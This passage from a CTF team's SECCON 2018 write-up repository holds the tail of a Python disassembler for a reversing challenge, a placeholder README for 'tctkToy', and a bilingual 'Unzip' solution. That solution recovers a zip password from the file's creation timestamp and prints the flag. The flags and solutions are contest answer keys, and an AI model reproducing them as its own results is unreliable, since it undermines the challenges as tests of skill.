ins.startswith("111000"): 71 | mnemonic = "bgeu 0x???" 72 | elif ins.startswith("110011"): 73 | mnemonic = "bgt 0x???" 74 | elif ins.startswith("110101"): 75 | mnemonic = "bgtu 0x???" 76 | elif ins.startswith("110111"): 77 | mnemonic = "ble 0x???" 78 | elif ins.startswith("111001"): 79 | mnemonic = "bleu 0x???" 80 | elif ins.startswith("110010"): 81 | mnemonic = "blt 0x???" 82 | elif ins.startswith("110100"): 83 | mnemonic = "bltu 0x???" 84 | elif ins.startswith("110001"): 85 | mnemonic = "bne 0x???" 86 | elif ins.startswith("00110101"): 87 | mnemonic = "brk" 88 | elif ins.startswith("00001110"): 89 | mnemonic = "cmp %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 90 | elif ins.startswith("1001"): 91 | mnemonic = "dec %s, 0x%s" % (reg(s[i] & 0xF), s[i+1]) 92 | elif ins.startswith("00110001"): 93 | mnemonic = "div %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 94 | elif ins.startswith("1010"): 95 | mnemonic = "gsr %s, %s" % (reg(s[i] & 0xF), reg(s[i+1])) 96 | elif ins.startswith("1000"): 97 | mnemonic = "inc %s, %s" % (reg(s[i] & 0xF), hex(s[i+1])) 98 | elif ins.startswith("00100101"): 99 | mnemonic = "jmp %s" % (reg(s[i+1] & 0xF)) 100 | elif ins.startswith("00011010"): 101 | mnemonic = "jmpa 0x???" 102 | add = 4 103 | elif ins.startswith("00011001"): 104 | mnemonic = "jsr %s" % (reg(s[i+1] >> 4)) 105 | elif ins.startswith("00000011"): 106 | mnemonic = "jsra %s" % (addr(i+2, 4)) 107 | add = 4 108 | elif ins.startswith("00011100"): 109 | mnemonic = "ld.b %s, (%s)" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 110 | elif ins.startswith("00001010"): 111 | mnemonic = "ld.l %s, (%s)" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 112 | elif ins.startswith("00100001"): 113 | mnemonic = "ld.s %s, (%s)" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 114 | elif ins.startswith("00011101"): 115 | mnemonic = "lda.b" 116 | add = 4 117 | elif ins.startswith("00001000"): 118 | mnemonic = "lda.l" 119 | add = 4 120 | elif ins.startswith("00100010"): 121 | mnemonic = "lda.s" 122 | add = 4 123 | elif ins.startswith("00000001"): 124 | mnemonic = "ldi.l %s, %s" % (reg(s[i+1] >> 4), addr(i+2, 4)) 125 | add = 4 126 | elif ins.startswith("00011011"): 127 | mnemonic = "ldi.b" 128 | add = 4 129 | elif ins.startswith("00100000"): 130 | mnemonic = "ldi.s" 131 | add = 4 132 | elif ins.startswith("00110110"): 133 | mnemonic = "ldo.b" 134 | add = 2 135 | elif ins.startswith("00001100"): 136 | mnemonic = "ldo.l" 137 | add = 2 138 | elif ins.startswith("00111000"): 139 | mnemonic = "ldo.s" 140 | add = 2 141 | elif ins.startswith("00100111"): 142 | mnemonic = "lshr %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 143 | elif ins.startswith("00110011"): 144 | mnemonic = "mod %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 145 | elif ins.startswith("00000010"): 146 | mnemonic = "mov %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 147 | elif ins.startswith("00101111"): 148 | mnemonic = "mul %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 149 | elif ins.startswith("00010101"): 150 | mnemonic = "mul.x %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 151 | elif ins.startswith("00101010"): 152 | mnemonic = "neg %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 153 | elif ins.startswith("00001111"): 154 | mnemonic = "nop" 155 | elif ins.startswith("00101100"): 156 | mnemonic = "not %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 157 | elif ins.startswith("00101011"): 158 | mnemonic = "or %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 159 | elif ins.startswith("00000111"): 160 | mnemonic = "pop %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 161 | elif ins.startswith("00000110"): 162 | mnemonic = "push %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 163 | elif ins.startswith("00000100"): 164 | mnemonic = "ret" 165 | elif ins.startswith("00010000"): 166 | mnemonic = "sex.b %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 167 | elif ins.startswith("00010001"): 168 | mnemonic = "sex.s %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 169 | elif ins.startswith("1011"): 170 | mnemonic = "ssr %s, %s" % (reg(s[i] & 0xF), reg(s[i+1])) 171 | elif ins.startswith("00011110"): 172 | mnemonic = "st.b (%s), %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 173 | elif ins.startswith("00001011"): 174 | mnemonic = "st.l (%s), %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 175 | elif ins.startswith("00100011"): 176 | mnemonic = "st.s (%s), %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 177 | elif ins.startswith("00011111"): 178 | mnemonic = "sta.b 0x???" 179 | add = 4 180 | elif ins.startswith("00001001"): 181 | mnemonic = "sta.l 0x???" 182 | add = 4 183 | elif ins.startswith("00100100"): 184 | mnemonic = "sta.s 0x???" 185 | add = 4 186 | elif ins.startswith("00110111"): 187 | mnemonic = "sto.b 0x???" 188 | add = 2 189 | elif ins.startswith("00001101"): 190 | mnemonic = "sto.l 0x???" 191 | add = 2 192 | elif ins.startswith("00111001"): 193 | mnemonic = "sto.s 0x???" 194 | add = 2 195 | elif ins.startswith("00101001"): 196 | mnemonic = "sub %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 197 | elif ins.startswith("00110000"): 198 | mnemonic = "swi ???" 199 | add = 4 200 | elif ins.startswith("00110010"): 201 | mnemonic = "udiv %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 202 | elif ins.startswith("00110100"): 203 | mnemonic = "umod %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 204 | elif ins.startswith("00010100"): 205 | mnemonic = "umul.x %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 206 | elif ins.startswith("00101110"): 207 | mnemonic = "xor %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 208 | elif ins.startswith("00010010"): 209 | mnemonic = "zex.b %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 210 | elif ins.startswith("00010011"): 211 | mnemonic = "zex.s %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 212 | else: 213 | mnemonic = "???" 214 | print("%s:\t%s\t%s" % (hex(base+i), hex(s[i])[2:].zfill(2) + " " + hex(s[i+1])[2:].zfill(2), mnemonic)) 215 | i += add + 2 216 | print 217 | 218 | e = ELF('runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be') 219 | 220 | base = 0x0000136c 221 | def disas_function(name, address, length): 222 | print "function", name 223 | disas(e.read(address, length), address, base, e) 224 | 225 | def print_symbol(name, address, length): 226 | print "%s:" % name, e.read(address, length).encode('hex') 227 | 228 | disas_function("main", 0x000015a2, 156) 229 | disas_function("decode", 0x00001552, 80) 230 | disas_function("set_random_seed", 0x0000154a, 4) 231 | disas_function("get_random_value", 0x0000154e, 4) 232 | print_symbol("flag", e.symbols['flag'], 32) 233 | print_symbol("randval", e.symbols['randval'], 32) 234 | -------------------------------------------------------------------------------- /seccon2018/special-instructions/runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/special-instructions/runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be -------------------------------------------------------------------------------- /seccon2018/tctktoy/README.md: -------------------------------------------------------------------------------- 1 | # tctkToy 2 | --- 3 | **Points:** 419 | **Solves:** 16/653 | **Category:** Reversing 4 | 5 | The tctkToy was a fragile Windows application toy. Reverse and repair it in order to work well. SUPPORT: Recommend using Windows10 machine to run successfully. 6 | 7 | P.S. File changed to this (28th 09:52JST(28th 00:52UTC)) file.zip_5bd5bdb6eaf308b509af1c466b8a76578b75cdd9 8 | 9 | Hint : you can write a tcl file with just only "button", "exec", "cd", "wm", "canvas", "image" and "pack" command. 10 | 11 | [Download](file.zip_5bd5bdb6eaf308b509af1c466b8a76578b75cdd9) 12 | 13 | --- 14 | 15 | [Bahasa Indonesia](#bahasa-indonesia) 16 | 17 | ## English 18 | TODO 19 | 20 | 21 | ## Bahasa Indonesia 22 | TODO 23 | -------------------------------------------------------------------------------- /seccon2018/tctktoy/file.zip_5bd5bdb6eaf308b509af1c466b8a76578b75cdd9: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/tctktoy/file.zip_5bd5bdb6eaf308b509af1c466b8a76578b75cdd9 -------------------------------------------------------------------------------- /seccon2018/unzip/README.md: -------------------------------------------------------------------------------- 1 | # Unzip 2 | --- 3 | **Points:** 101 | **Solves:** 597/653 | **Category:** Forensics 4 | 5 | Unzip flag.zip. 6 | 7 | [Download](unzip.zip_26c0cb5b40e9f78641ae44229cda45529418183f) 8 | 9 | --- 10 | 11 | [Bahasa Indonesia](#bahasa-indonesia) 12 | 13 | ## English 14 | We got `flag.zip` and `makefile.sh`. 15 | 16 | This is the content of `makefile.sh`. 17 | 18 | ``` 19 | echo 'SECCON{'`cat key`'}' > flag.txt 20 | zip -e --password=`perl -e "print time()"` flag.zip flag.txt 21 | ``` 22 | 23 | We need to know the Unix time of date created of `flag.zip`. 24 | 25 | By using `ls -l` we can know the file timestamp is `Fri, Oct 26 2018 15:10:41 UTC`. We can convert the timestamp to Unix time and use it to open `flag.zip`. 26 | 27 | ```sh 28 | $ php -a 29 | Interactive shell 30 | 31 | php > echo strtotime('Fri, Oct 26 2018 15:10:41'); 32 | 1540566641 33 | 34 | $ unzip flag.zip 35 | Archive: flag.zip 36 | [flag.zip] flag.txt password: 1540566641 37 | inflating: flag.txt 38 | 39 | $ cat flag.txt 40 | SECCON{We1c0me_2_SECCONCTF2o18} 41 | ``` 42 | 43 | Flag: `SECCON{We1c0me_2_SECCONCTF2o18}` 44 | 45 | ## Bahasa Indonesia 46 | Kita dapat `flag.zip` dan `makefile.sh`. 47 | 48 | Berikut adalah isi dari `makefile.sh`. 49 | 50 | ``` 51 | echo 'SECCON{'`cat key`'}' > flag.txt 52 | zip -e --password=`perl -e "print time()"` flag.zip flag.txt 53 | ``` 54 | 55 | Kita harus mengetahui Unix time dari waktu `flag.zip` dibuat. 56 | 57 | Dengan menggunakan `ls -l` kita dapat tahu timestamp dari file adalah `Fri, Oct 26 2018 15:10:41 UTC`. Kita dapat mengkonversikannya menjadi Unix time dan menggunakannya untuk membuka `flag.zip`. 58 | 59 | ```sh 60 | $ php -a 61 | Interactive shell 62 | 63 | php > echo strtotime('Fri, Oct 26 2018 15:10:41'); 64 | 1540566641 65 | 66 | $ unzip flag.zip 67 | Archive: flag.zip 68 | [flag.zip] flag.txt password: 1540566641 69 | inflating: flag.txt 70 | 71 | $ cat flag.txt 72 | SECCON{We1c0me_2_SECCONCTF2o18} 73 | ``` 74 | 75 | Flag: `SECCON{We1c0me_2_SECCONCTF2o18}` 76 | -------------------------------------------------------------------------------- /seccon2018/unzip/unzip.zip_26c0cb5b40e9f78641ae44229cda45529418183f: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/unzip/unzip.zip_26c0cb5b40e9f78641ae44229cda45529418183f --------------------------------------------------------------------------------